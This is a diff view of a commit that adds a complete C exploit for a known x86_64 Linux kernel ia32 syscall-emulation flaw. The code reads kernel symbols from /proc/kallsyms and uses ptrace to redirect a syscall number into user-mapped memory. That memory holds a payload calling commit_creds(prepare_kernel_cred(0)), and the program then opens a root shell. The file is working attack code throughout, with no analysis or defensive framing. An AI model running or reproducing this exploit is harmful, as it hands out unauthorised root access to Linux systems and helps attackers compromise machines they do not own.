|
| 1 | +/* |
| 2 | + * exploit for x86_64 linux kernel ia32syscall emulation (again) |
| 3 | + * rediscovered by ben hawkes |
| 4 | + * with help from robert swiecki and tavis ormandy |
| 5 | + * |
| 6 | + * original vulnerability discovered by Wojciech Purczynski |
| 7 | + * |
| 8 | + * original exploit by |
| 9 | + * Robert Swiecki <robert_at_swiecki.net> |
| 10 | + * Przemyslaw Frasunek <venglin_at_freebsd.lublin.pl> |
| 11 | + * Pawel Pisarczyk <pawel_at_immos.com.pl> |
| 12 | + * |
| 13 | + * kernel priv escalation code borrowed from spender |
| 14 | + * |
| 15 | + */ |
| 16 | + |
| 17 | +#include <sys/types.h> |
| 18 | +#include <sys/wait.h> |
| 19 | +#include <sys/ptrace.h> |
| 20 | +#include <inttypes.h> |
| 21 | +#include <sys/reg.h> |
| 22 | +#include <unistd.h> |
| 23 | +#include <stdio.h> |
| 24 | +#include <stdlib.h> |
| 25 | +#include <sys/mman.h> |
| 26 | +#include <string.h> |
| 27 | + |
| 28 | +typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); |
| 29 | +typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); |
| 30 | +_commit_creds commit_creds; |
| 31 | +_prepare_kernel_cred prepare_kernel_cred; |
| 32 | + |
| 33 | +int kernelmodecode(void *file, void *vma) |
| 34 | +{ |
| 35 | + commit_creds(prepare_kernel_cred(0)); |
| 36 | + return -1; |
| 37 | +} |
| 38 | + |
| 39 | +unsigned long |
| 40 | +get_symbol(char *name) |
| 41 | +{ |
| 42 | + FILE *f; |
| 43 | + unsigned long addr; |
| 44 | + char dummy; |
| 45 | + char sname[512]; |
| 46 | + int ret = 0, oldstyle = 0; |
| 47 | + |
| 48 | + f = fopen("/proc/kallsyms", "r"); |
| 49 | + if (f == NULL) { |
| 50 | + f = fopen("/proc/ksyms", "r"); |
| 51 | + if (f == NULL) |
| 52 | + return 0; |
| 53 | + oldstyle = 1; |
| 54 | + } |
| 55 | + |
| 56 | + while (ret != EOF) { |
| 57 | + if (!oldstyle) { |
| 58 | + ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sname); |
| 59 | + } else { |
| 60 | + ret = fscanf(f, "%p %s\n", (void **) &addr, sname); |
| 61 | + if (ret == 2) { |
| 62 | + char *p; |
| 63 | + if (strstr(sname, "_O/") || strstr(sname, "_S.")) { |
| 64 | + continue; |
| 65 | + } |
| 66 | + p = strrchr(sname, '_'); |
| 67 | + if (p > ((char *) sname + 5) && !strncmp(p - 3, "smp", 3)) { |
| 68 | + p = p - 4; |
| 69 | + while (p > (char *)sname && *(p - 1) == '_') { |
| 70 | + p--; |
| 71 | + } |
| 72 | + *p = '\0'; |
| 73 | + } |
| 74 | + } |
| 75 | + } |
| 76 | + if (ret == 0) { |
| 77 | + fscanf(f, "%s\n", sname); |
| 78 | + continue; |
| 79 | + } |
| 80 | + if (!strcmp(name, sname)) { |
| 81 | + printf("resolved symbol %s to %p\n", name, (void *) addr); |
| 82 | + fclose(f); |
| 83 | + return addr; |
| 84 | + } |
| 85 | + } |
| 86 | + fclose(f); |
| 87 | + |
| 88 | + return 0; |
| 89 | +} |
| 90 | + |
| 91 | + |
| 92 | +static void docall(uint64_t *ptr, uint64_t size) |
| 93 | +{ |
| 94 | + commit_creds = (_commit_creds) get_symbol("commit_creds"); |
| 95 | + if (!commit_creds) { |
| 96 | + printf("symbol table not available, aborting!\n"); |
| 97 | + exit(1); |
| 98 | + } |
| 99 | + |
| 100 | + prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred"); |
| 101 | + if (!prepare_kernel_cred) { |
| 102 | + printf("symbol table not available, aborting!\n"); |
| 103 | + exit(1); |
| 104 | + } |
| 105 | + |
| 106 | + uint64_t tmp = ((uint64_t)ptr & ~0x00000000000FFF); |
| 107 | + |
| 108 | + printf("mapping at %lx\n", tmp); |
| 109 | + |
| 110 | + if (mmap((void*)tmp, size, PROT_READ|PROT_WRITE|PROT_EXEC, |
| 111 | + MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) { |
| 112 | + printf("mmap fault\n"); |
| 113 | + exit(1); |
| 114 | + } |
| 115 | + |
| 116 | + for (; (uint64_t) ptr < (tmp + size); ptr++) |
| 117 | + *ptr = (uint64_t)kernelmodecode; |
| 118 | + |
| 119 | + __asm__("\n" |
| 120 | + "\tmovq $0x101, %rax\n" |
| 121 | + "\tint $0x80\n"); |
| 122 | + |
| 123 | + printf("UID %d, EUID:%d GID:%d, EGID:%d\n", getuid(), geteuid(), getgid(), getegid()); |
| 124 | + execl("/bin/sh", "bin/sh", NULL); |
| 125 | + printf("no /bin/sh ??\n"); |
| 126 | + exit(0); |
| 127 | +} |
| 128 | + |
| 129 | +int main(int argc, char **argv) |
| 130 | +{ |
| 131 | + int pid, status, set = 0; |
| 132 | + uint64_t rax; |
| 133 | + uint64_t kern_s = 0xffffffff80000000; |
| 134 | + uint64_t kern_e = 0xffffffff84000000; |
| 135 | + uint64_t off = 0x0000000800000101 * 8; |
| 136 | + |
| 137 | + if (argc == 4) { |
| 138 | + docall((uint64_t*)(kern_s + off), kern_e - kern_s); |
| 139 | + exit(0); |
| 140 | + } |
| 141 | + |
| 142 | + if ((pid = fork()) == 0) { |
| 143 | + ptrace(PTRACE_TRACEME, 0, 0, 0); |
| 144 | + execl(argv[0], argv[0], "2", "3", "4", NULL); |
| 145 | + perror("exec fault"); |
| 146 | + exit(1); |
| 147 | + } |
| 148 | + |
| 149 | + if (pid == -1) { |
| 150 | + printf("fork fault\n"); |
| 151 | + exit(1); |
| 152 | + } |
| 153 | + |
| 154 | + for (;;) { |
| 155 | + if (wait(&status) != pid) |
| 156 | + continue; |
| 157 | + |
| 158 | + if (WIFEXITED(status)) { |
| 159 | + printf("Process finished\n"); |
| 160 | + break; |
| 161 | + } |
| 162 | + |
| 163 | + if (!WIFSTOPPED(status)) |
| 164 | + continue; |
| 165 | + |
| 166 | + if (WSTOPSIG(status) != SIGTRAP) { |
| 167 | + printf("Process received signal: %d\n", WSTOPSIG(status)); |
| 168 | + break; |
| 169 | + } |
| 170 | + |
| 171 | + rax = ptrace(PTRACE_PEEKUSER, pid, 8*ORIG_RAX, 0); |
| 172 | + if (rax == 0x000000000101) { |
| 173 | + if (ptrace(PTRACE_POKEUSER, pid, 8*ORIG_RAX, off/8) == -1) { |
| 174 | + printf("PTRACE_POKEUSER fault\n"); |
| 175 | + exit(1); |
| 176 | + } |
| 177 | + set = 1; |
| 178 | + //rax = ptrace(PTRACE_PEEKUSER, pid, 8*ORIG_RAX, 0); |
| 179 | + } |
| 180 | + |
| 181 | + if ((rax == 11) && set) { |
| 182 | + ptrace(PTRACE_DETACH, pid, 0, 0); |
| 183 | + for(;;) |
| 184 | + sleep(10000); |
| 185 | + } |
| 186 | + |
| 187 | + if (ptrace(PTRACE_SYSCALL, pid, 1, 0) == -1) { |
| 188 | + printf("PTRACE_SYSCALL fault\n"); |
| 189 | + exit(1); |
| 190 | + } |
| 191 | + } |
| 192 | + |
| 193 | + return 0; |
| 194 | +} |
0 commit comments